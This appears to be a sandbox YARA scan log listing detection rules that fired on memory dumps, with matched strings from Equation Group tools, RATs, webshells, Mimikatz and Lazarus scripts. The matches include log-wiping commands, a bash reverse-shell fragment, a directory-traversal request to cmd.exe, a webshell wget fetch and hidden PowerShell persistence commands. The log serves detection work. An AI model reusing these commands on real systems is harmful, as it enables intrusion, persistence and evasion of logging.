00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Impacket_Tools_Generic_1	Compiled Impacket Tools	Florian Roth	0x36913:$s1: bpywintypes27.dll 0x36929:$s2: hZFtPC 0xbaa4:$s3: impacket 0xbab6:$s3: impacket 0xbac9:$s3: impacket 0x343e6:$s3: impacket 0x344b2:$s3: impacket 0x34550:$s3: impacket 0x346ad:$s3: impacket 0x3477d:$s3: impacket 0x34816:$s3: impacket 0x3496e:$s3: impacket 0x34aea:$s3: impacket 0x34baf:$s3: impacket 0x34c5a:$s3: impacket 0x34d23:$s3: impacket 0x34dc1:$s3: impacket 0x34e79:$s3: impacket 0x34f23:$s3: impacket 0x35089:$s3: impacket 0x3514c:$s3: impacket
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_Auditcleaner	Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner	Florian Roth	0x2d0d2:$x1: > /var/log/audit/audit.log; rm -f . 0x2d0fa:$x2: Pastables to run on target: 0x2d11a:$x3: cp /var/log/audit/audit.log .tmp 0x2d13f:$l1: Here is the first good cron session from 0x2d16c:$l2: No need to clean LOGIN lines.
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_elgingamble	Equation Group hack tool leaked by ShadowBrokers- file elgingamble	Florian Roth	0x2f27b:$x1: * * * * * root chown root %s; chmod 4755 %s; %s 0x2f2af:$x2: [-] kernel not vulnerable 0x317b2:$x2: [-] kernel not vulnerable 0x319c0:$x2: [-] kernel not vulnerable 0x31baa:$x2: [-] kernel not vulnerable 0x2f2cd:$x3: [-] failed to spawn shell: %s 0x2f2ef:$x4: -s shell Use shell instead of %s
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_cmsd	Equation Group hack tool leaked by ShadowBrokers- file cmsd	Florian Roth	0x2f493:$x1: usage: %s address [-t][-s\|-c command] [-p port] [-v 5\|6\|7] 0x2f4d2:$x2: error: not vulnerable 0x2f4ec:$s1: port=%d connected! 0x2f504:$s2: xxx.XXXXXX
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_ebbshave	Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5	Florian Roth	0x2f693:$s1: executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s 0x2f6d1:$s2: ./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772 0x2f70f:$s3: version 1 - Start with option #18 first, if it fails then try this option 0x2f75d:$s4: %s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_eggbasket	Equation Group hack tool leaked by ShadowBrokers- file eggbasket	Florian Roth	0x2f930:$x1: # Building Shellcode into exploit. 0x2f957:$x2: %s -w /index.html -v 3.5 -t 10 -c "/usr/openwin/bin/xterm -d 555.1.2.2:0&" -d 10.0.0.1 -p 80 0x2f9b9:$x3: # STARTING EXHAUSTIVE ATTACK AGAINST
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_sambal	Equation Group hack tool leaked by ShadowBrokers- file sambal	Florian Roth	0x2fd7e:$s1: + Bruteforce mode. 0x2fd95:$s3: + Host is not running samba! 0x2fdb6:$s4: + connecting back to: [%d.%d.%d.%d:45295] 0x2fde4:$s5: + Exploit failed, try -b to bruteforce. 0x2fe10:$s7: Usage: %s [-bBcCdfprsStv] [host]
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_envisioncollision	Equation Group hack tool leaked by ShadowBrokers- file envisioncollision	Florian Roth	0x301d0:$x1: mysql \$D --host=\$H --user=\$U --password=\"\$P\" -e \"select * from \$T 0x3021e:$x2: Window 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard -c\"sleep 500\|nc 0x30269:$s3: $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"); 0x302af:$s4: $url = $host . "/admin/index.php?adsess=" . $enter . "&app=core&module=applications&section=hooks&do=install_hook";
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_cmsex	Equation Group hack tool leaked by ShadowBrokers- file cmsex	Florian Roth	0x3049e:$x1: Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> \| -t <port>) 0x304f9:$x2: -i target ip address / hostname 0x3051e:$x3: Note: Choosing the correct target type is a bit of guesswork. 0x30560:$x4: Solaris rpc.cmsd remote root exploit 0x30589:$x5: If one choice fails, you may want to try another.
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_DUL	Equation Group hack tool leaked by ShadowBrokers- file DUL	Florian Roth	0x308d5:$x1: ?Usage: %s <shellcode> <output_file> 0x308fe:$x2: Here is the decoder+(encoded-decoder)+payload
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_slugger2	Equation Group hack tool leaked by ShadowBrokers- file slugger2	Florian Roth	0x30aad:$x1: usage: %s hostip port cmd [printer_name] 0x30ada:$x2: command must be less than 61 chars 0x30b01:$s1: __rw_read_waiting 0x30742:$s2: completed.1 0x30b17:$s2: completed.1 0x30b27:$s3: __mutexkind 0x30b37:$s4: __rw_pshared
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_jackpop	Equation Group hack tool leaked by ShadowBrokers- file jackpop	Florian Roth	0x30f8f:$x1: %x:%d --> %x:%d %d bytes 0x30fad:$s1: client: can't bind to local address, are you root? 0x30fe4:$s2: Unable to register port 0x31000:$s3: Could not resolve destination 0x31022:$s4: raw troubles
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_epoxyresin_v1_0_0	Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1	Florian Roth	0x2f2af:$x1: [-] kernel not vulnerable 0x317b2:$x1: [-] kernel not vulnerable 0x319c0:$x1: [-] kernel not vulnerable 0x31baa:$x1: [-] kernel not vulnerable 0x317d0:$s1: .tmp.%d.XXXXXX 0x317e3:$s2: [-] couldn't create temp file 0x31805:$s3: /boot/System.map-%s
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_estesfox	Equation Group hack tool leaked by ShadowBrokers- file estesfox	Florian Roth	0x32729:$x1: chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_elatedmonkey_1_0_1_1	Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh	Florian Roth	0x328fc:$x3: Usage: $0 ( -s IP PORT \| CMD ) 0x3291f:$s5: os.execl("/bin/sh", "/bin/sh", "-c", "$CMD") 0x32951:$s13: PHP_SCRIPT="$HOME/public_html/info$X.php" 0x32980:$s15: cat > /dev/tcp/127.0.0.1/80 <<END
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup__ftshell_ftshell_v3_10_3_0	Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7	Florian Roth	0x32d55:$s1: set uRemoteUploadCommand "[exec cat /current/.ourtn-ftshell-upcommand]" 0x32da1:$s2: send "\[ \"\$BASH\" = \"/bin/bash\" -o \"\$SHELL\" = \"/bin/bash\" \] && 0x32dee:$s3: system rm -f /current/tmp/ftshell.latest 0x32e1b:$s4: # ftshell -- File Transfer Shell
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup__scanner_scanner_v2_1_2	Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2	Florian Roth	0x1fe7e:$s1: Welcome to the network scanning tool 0x32fe1:$s1: Welcome to the network scanning tool 0x3300a:$s2: Scanning port %d 0x3301f:$s3: /current/down/cmdout/scans 0x3303e:$s4: Scan for SSH version 0x33057:$s5: program vers proto port service
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup__ghost_sparc_ghost_x86_3	Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86	Florian Roth	0x3321f:$x1: Usage: %s [-v os] [-p] [-r] [-c command] [-a attacker] target 0x33261:$x2: Sending shellcode as part of an open command... 0x33295:$x3: cmdshellcode 0x332a6:$x4: You will not be able to run the shellcode. Exiting...
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup__jparsescan_parsescan_5	Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan	Florian Roth	0x336b6:$s1: # default is to dump out all scanned hosts found 0x336eb:$s2: $bool .= " -r " if (/mibiisa.* -r/); 0x33714:$s3: sadmind is available on two ports, this also works) 0x3374c:$s4: -x IP gives \"hostname:# users:load ...\" if positive xwin scan
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup__funnelout_v4_1_0_1	Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl	Florian Roth	0x33930:$s1: header("Set-Cookie: bbsessionhash=" . \$hash . "; path=/; HttpOnly"); 0x3397a:$s2: if ($code =~ /proxyhost/) { 0x3399a:$s3: \$rk[1] = \$rk[1] - 1; 0x339b5:$s4: #existsUser($u) or die "User '$u' does not exist in database.\n";
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup__magicjack_v1_1_0_0_client	Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py	Florian Roth	0x33bac:$s1: temp = ((left >> 1) ^ right) & 0x55555555 0x33bda:$s2: right ^= (temp << 16) & 0xffffffff 0x33c02:$s3: tempresult = "" 0x33c16:$s4: num = self.bytes2long(data)
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup__ftshell	Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7	Florian Roth	0x33dcb:$s1: if { [string length $uRemoteUploadCommand] 0x33dfa:$s2: processUpload 0x33e0c:$s3: global dothisreallyquiet
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_noclient_3_3_2	Equation Group hack tool set	Florian Roth	0x2a5f8:$x1: 127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning 0x2a64e:$x2: iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP; 0x2a697:$x3: noclient: failed to execute %s: %s 0x2a6be:$x4: sh -c "ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx " 0x2a6f8:$s5: Attempting connection from 0.0.0.0:
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_Toolset_Apr17_Eternalromance	Detects EquationGroup Tool - April Leak	Florian Roth	0x1e8ed:$x1: [-] Error: Exploit choice not supported for target OS!! 0x1e929:$x2: Error: Target machine out of NPP memory (VERY BAD!!) - Backdoor removed 0x1e975:$x3: [-] Error: Backdoor not present on target 0x1e9a3:$x4: ********* TARGET ARCHITECTURE IS X64 **********
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_Toolset_Apr17_Gen2	Detects EquationGroup Tool - April Leak	Florian Roth	0x1ef71:$s1: [+] Setting password : (NULL) 0x1ef93:$s2: [-] TbBuffCpy() failed! 0x1efaf:$s3: [+] SMB negotiation 0x1efc7:$s4: 12345678-1234-ABCD-EF00-0123456789AB 0x1eff0:$s5: Value must end with 0000 (2 NULLs) 0x1f017:$s6: [] Configuring Payload 0x1f033:$s7: [] Connecting to listener 0x1f053:$op1: B0 42 40 00 89 44 24 30 C7 44 24 34 0x1f065:$op2: EB 59 8B 4C 24 10 68 1C 46
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_Toolset_Apr17_ntevt	Detects EquationGroup Tool - April Leak	Florian Roth	0x20391:$x1: c:\ntevt.pdb 0x203a2:$s1: ARASPVU 0x203af:$op1: 41 5A 41 59 41 58 5F 5E 5D 5A 59 5B 58 48 83 C4 0x23b78:$op1: 41 5A 41 59 41 58 5F 5E 5D 5A 59 5B 58 48 83 C4 0x203c5:$op2: F9 48 03 FA 48 33 C0 8A 01 49 03 C1 49 F7 E0 88 0x23b8e:$op2: F9 48 03 FA 48 33 C0 8A 01 49 03 C1 49 F7 E0 88 0x203db:$op3: 01 41 F6 E0 49 03 C1 88 01 48 33 0x23ba4:$op3: 01 41 F6 E0 49 03 C1 88 01 48 33
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld	Detects EquationGroup Tool - April Leak	Florian Roth	0x271a0:$s1: PQRAPAQSTUVWARASATAUAVAW 0x271bd:$s2: SQRUWVAWAVAUATASARAQAP 0x271d8:$s3: iijymqp 0x271e4:$s4: AWAVAUATASARAQI 0x271f8:$s5: WARASATAUAVM 0x2720a:$op1: 0C 80 30 02 48 83 C2 01 49 83 E9 01 75 E1 C3 CC 0x27220:$op2: E8 10 66 0D 00 80 66 31 02 48 83 C2 02 49 83 E9 0x27236:$op3: 48 B8 53 A5 E1 41 D4 F1 07 00 48 33
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0	Detects EquationGroup Tool - April Leak	Florian Roth	0x275d9:$x1: DFReader.exe logfile AESKey [-j] [-o outputfilename] 0x27612:$x2: Double Feature Target Version 0x27634:$x3: DoubleFeature Process ID 0x27652:$op1: A1 30 21 41 00 89 85 D8 FC FF FF A1 34 21 41 00
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4	Detects EquationGroup Tool - April Leak	Florian Roth	0x27bed:$x1: * Listening Post DLL %s() returned error code %d. 0x27c23:$s1: WsaErrorTooManyProcesses 0x1e2e6:$s2: NtErrorMoreProcessingRequired 0x27c40:$s2: NtErrorMoreProcessingRequired 0x1bce9:$s3: Connection closed by remote host (TCP Ack/Fin) 0x27c62:$s3: Connection closed by remote host (TCP Ack/Fin) 0x27c95:$s4: ServerErrorBadNamePassword
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	EquationGroup_scanner_output	Detects output generated by EQGRP scanner.exe	Florian Roth	0x1b8c5:$s0: # scanning ip 0x1fe5f:$s0: # scanning ip 0x1b8d9:$s1: # Scan for windows boxes 0x1b8f6:$s2: Going into send 0x1b90a:$s3: # Does not work 0x1b91e:$s4: You are the weakest link, goodbye 0x1b944:$s5: rpc Scan for RPC folks
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	JoeSecurity_xtremerat_1	Yara detected Xtreme RAT	Joe Security
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	JoeSecurity_PupyRAT	Yara detected PupyRAT	Joe Security
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	dragos_crashoverride_moduleStrings	IEC-104 Interaction Module Program Strings	Dragos Inc	0x179aa:$s1: IEC-104 client: ip=%s; port=%s; ASDU=%u 0x1799b:$s5: iec104.log
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Obfuscated_VBS_April17	Detects cloaked Mimikatz in VBS obfuscation	Florian Roth	0x1b5ae:$s1: ::::::ExecuteGlobal unescape(unescape(
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Obfuscated_JS_April17	Detects cloaked Mimikatz in JS obfuscation	Florian Roth	0x1b746:$s1: ";function Main(){for(var 0x1b765:$s2: =String.fromCharCode(parseInt( 0x1b788:$s3: ));(new Function(
0000000A.00000003.316499473.0000000006860000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x3d768:$f: PPWDUMP_DATA
0000000A.00000002.523349455.00000000022DB000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x13f108:$a: Amplia Security 0x13f280:$a: Amplia Security 0x13f29e:$c: getlsasrvaddr.exe 0x13f2be:$d: Cannot get PID of LSASS.EXE 0x13f2e8:$e: extract the TGT session key 0x13f312:$f: PPWDUMP_DATA
0000000A.00000002.523349455.00000000022DB000.00000004.00000001.sdmp	scanarator	Auto-generated rule on file scanarator.exe	yarGen Yara Rule Generator by Florian Roth	0x13f03c:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
0000000A.00000003.322872020.0000000006854000.00000004.00000001.sdmp	shankar_php_php	Semi-Auto-generated - file shankar.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x926:$sAuthor: ShAnKaR
0000000A.00000003.323493568.00000000068EC000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0xb140:$d: Cannot get PID of LSASS.EXE 0xb2c0:$e: extract the TGT session key
0000000A.00000003.323493568.00000000068EC000.00000004.00000001.sdmp	SQLMap	This signature detects the SQLMap SQL injection tool	Florian Roth	0xf6c8:$s1: except SqlmapBaseException, ex:
0000000A.00000003.323493568.00000000068EC000.00000004.00000001.sdmp	PortRacer	Auto-generated rule on file PortRacer.exe	yarGen Yara Rule Generator by Florian Roth	0xad20:$s0: Auto Scroll BOTH Text Boxes 0xaf90:$s4: Start/Stop Portscanning 0xf348:$s6: Auto Save LogFile by pressing STOP
00000013.00000003.420266978.00000000051E4000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0xf580:$a: Amplia Security
00000013.00000003.420266978.00000000051E4000.00000004.00000001.sdmp	Fierce2	This signature detects the Fierce2 domain scanner	Florian Roth	0xf398:$s1: $tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,
00000013.00000003.420266978.00000000051E4000.00000004.00000001.sdmp	webshell_Shell_ci_Biz_was_here_c100_v_xxx	Web Shell - from files Shell [ci	unknown	0xf758:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null" 0xf1b8:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
00000013.00000003.420266978.00000000051E4000.00000004.00000001.sdmp	Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php	Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0xf439:$s0: Safe0ver
0000000A.00000003.322972936.00000000050C1000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x9d0:$a: Amplia Security
0000000A.00000003.322972936.00000000050C1000.00000004.00000001.sdmp	webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat	Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php	Florian Roth	0xbf8:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } 0xd38:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
0000000A.00000003.322972936.00000000050C1000.00000004.00000001.sdmp	Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php	Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0xe79:$s0: Safe0ver
00000013.00000003.464807403.0000000006D9C000.00000004.00000001.sdmp	shankar_php_php	Semi-Auto-generated - file shankar.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x35b6:$sAuthor: ShAnKaR
0000000A.00000003.312897828.0000000006654000.00000004.00000001.sdmp	Empire_Invoke_Shellcode	Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1	Florian Roth	0x308:$s2: "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) )
0000000A.00000003.312897828.0000000006654000.00000004.00000001.sdmp	Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php	Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x48b:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
00000013.00000002.542830535.0000000002FAE000.00000004.00000040.sdmp	scanarator	Auto-generated rule on file scanarator.exe	yarGen Yara Rule Generator by Florian Roth	0xf78:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	Volgmer_Malware	Detects Volgmer malware as reported in US CERT TA17-318B	Florian Roth	0x22fc2:$x1: User-Agent: Mozillar/5.0 0x23002:$x3: [TestConnect To Bot] - Port = %d 0x23027:$x4: b50a338264226b6d57c1936d9db140ba74a28930270a083353645a9b518661f4fcea160d7 0x2308a:$s2: H_%s_%016I64X_%04d%02d%02d%02d%02d%02d.TXT 0x230d5:$s4: %s\dllcache\%s.dll 0x230ec:$s5: Cond Fail. 0x230fb:$s6: The %s %s%s 0x2310b:$s7: %s "%s"%s "%s" %s "%s" 0x23126:$s8: DLL_Spider.dll
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	RemCom_RemoteCommandExecution	Detects strings from RemCom tool	Florian Roth	0x1ee2c:$: \\.\pipe\%s%s%d 0x1ee3e:$: %s\pipe\%s%s%d%s 0x1ee51:$: \ADMIN$\System32\%s%s
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	ProcessInjector_Gen	Detects a process injection utility that can be used ofr good and bad purposes	Florian Roth	0x10fd0:$x1: Error injecting remote thread in process: 0x10ffe:$s5: [-] Error getting access to process: %ld! 0x1102c:$s6: --process-name <name> Process name to inject 0x1105f:$s12: No injection target has been provided! 0x1108b:$s17: [-] An app path is required when not injecting!
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	Lazagne_PW_Dumper	Detects Lazagne PW Dumper	Markus Neis / Florian Roth	0x13510:$s1: Crypto.Hash 0x13520:$s2: laZagne 0x1352c:$s3: impacket.winregistry
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	SUSP_shellpop_Bash	Detects susupicious bash command	Tobias Michalski	0xce91:$: /bin/bash -i >& /dev/tcp/
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	GoldDragon_Aux_File	Detects export from Gold Dragon - February 2018	Florian Roth	0x1b5ff:$x1: /////////////////////regkeyenum//////////// 0x1b8ac:$x1: /////////////////////regkeyenum////////////
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	VBS_dropper_script_Dec17_1	Detects a supicious VBS script that drops an executable	Florian Roth	0x1ec7d:$s1: TVpTAQEAAAAEAA 0x1ec90:$s2: TVoAAAAAAAAAAA 0x1eca3:$s3: TVqAAAEAAAAEAB 0x1ecb6:$s4: TVpQAAIAAAAEAA 0x1ecc9:$s5: TVqQAAMAAAAEAA 0x223c6:$s5: TVqQAAMAAAAEAA 0x24783:$s5: TVqQAAMAAAAEAA 0x1ecdc:$a1: = CreateObject("Wscript.Shell")
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	Lazarus_Dec_17_5	Detects Lazarus malware from incident in Dec 2017	Florian Roth	0x20484:$x1: $ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList 0x204da:$x2: $respTxt = HttpRequestFunc_doprocess -szURI $szFullURL -szMethod $szMethod -contentData $contentData; 0x20544:$x3: [String]$PS_PATH = "C:\\Users\\Public\\Documents\\ProxyAutoUpdate.ps1"; 0x20590:$x4: $cmdSchedule = 'schtasks /create /tn "ProxyServerUpdater" 0x205ce:$x5: /tr "powershell.exe -ep bypass -windowstyle hidden -file 0x2060c:$x6: C:\\Users\\Public\\Documents\\tmp' + -join 0x2063c:$x7: $cmdResult = cmd.exe /c $cmdInst \| Out-String; 0x2066f:$x8: whoami /groups \| findstr /c:"S-1-5-32-544"
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	APT_Turla_Agent_BTZ_Gen_1	Detects Turla Agent.BTZ	Florian Roth	0xaa9a:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s 0x1182c:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s 0xab00:$s1: release mutex - %u (%u)(%u) 0xab20:$s2: \system32\win.com 0x119af:$s2: \system32\win.com 0xab36:$s3: Command Id:%u%010u(%02d:%02d:%02d %02d/%02d/%04d) 0xab6c:$s4: MakeFile Error(%d) copy file to temp file %s 0xab9d:$s5: %s%%s08x.tmp 0xabae:$s6: Run instruction: %d ID:%u%010u(%02d:%02d:%02d %02d/%02d/%04d) 0xabf0:$s7: Mutex_Log 0xabfe:$s8: %s\system32\winview.ocx 0xac49:$s10: Error: pos(%d) > CmdSize(%d) 0xac6b:$s11: \win.com 0xac79:$s12: Error(%d) run %s 0xac90:$s13: %02d.%02d.%04d Log begin: 0x11991:$s13: %02d.%02d.%04d Log begin:
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	Suspicious_BAT_Strings	Detects a string also used in Netwire RAT auxilliary	Florian Roth	0x1ddc6:$s1: ping 192.0.2.2 -n 1
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	Turla_Mal_Script_Jan18_1	Detects Turla malicious script	Florian Roth	0x1dfe1:$s1: .charCodeAt(i % 0x1dff6:$s2: {WScript.Quit();} 0x1e00c:$s3: .charAt(i)) << 10) \| 0x1e025:$s4: = WScript.Arguments;var 0x1e043:$s5: = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var i;
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	VBS_Obfuscated_Mal_Feb18_1	Detects malicious obfuscated VBS observed in February 2018	Florian Roth	0x191c2:$x1: A( Array( (1* 2^1 )+ 0x191db:$x2: .addcode(A( Array( 0x191f2:$x3: false:AA.send:Execute(AA.responsetext):end 0x19221:$x4: & A( Array( (1* 2^1 )+ 0x1923d:$s1: .SYSTEMTYPE:NEXT:IF (UCASE( 0x1925d:$s2: A = STR:next:end function 0x1927b:$s3: &WSCRIPT.SCRIPTFULLNAME&CHR
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	LokiBot_Dropper_ScanCopyPDF_Feb18	Auto-generated rule - file Scan Copy.pdf.com	Florian Roth	0x186b5:$a1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB 0x188a1:$a1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB 0x18708:$s2: Unstalled2
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x186b5:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB 0x188a1:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x21763:$sa1: -enc 0x217a0:$sb2: -window hidden 0x204b3:$sb3: -WindowStyle Hidden 0x205ec:$sb3: -windowstyle hidden 0xcbcc:$sc1: -nop 0xcbd1:$se1: -ep bypass 0x205e1:$se1: -ep bypass 0x21756:$se2: -exec bypass 0x21793:$se2: -exec bypass 0x1ac36:$se3: -ExecutionPolicy Bypass 0x21756:$se4: -exec bypass 0x21793:$se4: -exec bypass
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	Armitage_msfconsole	Detects Armitage component	Florian Roth	0x1fb30:$s1: \umeterpreter\u > 0x1fb46:$s3: ^meterpreter > 0x1fb5a:$s11: \umsf\u>
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	Armitage_OSX	Detects Armitage component	Florian Roth	0x1fc7a:$x1: resources/covertvpn-injector.exe 0x1fca0:$s10: resources/browserpivot.x64.dll 0x1fcc4:$s17: resources/msfrpcd_new.bat
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	Silence_malware_2	Detects malware sample mentioned in the Silence report on Securelist	Florian Roth	0x24c3a:$x1: \ScreenMonitorService\Release\smmsrv.pdb 0x24c67:$x2: \\.\pipe\{73F7975A-A4A2-4AB6-9121-AECAE68AABBB} 0x24c9b:$s1: My Sample Service: ServiceMain: SetServiceStatus returned error 0x24cdf:$s2: \mss.exe 0x24cec:$s3: \out.dat 0x24cf9:$s4: \mss.txt 0x24d06:$s5: Default monitor
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	Invoke_Mimikatz	Detects Invoke-Mimikatz String	Florian Roth	0x24798:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1e52c:$s1: stratum+tcp:// 0x1e53f:$s2: "normalHashing": true,
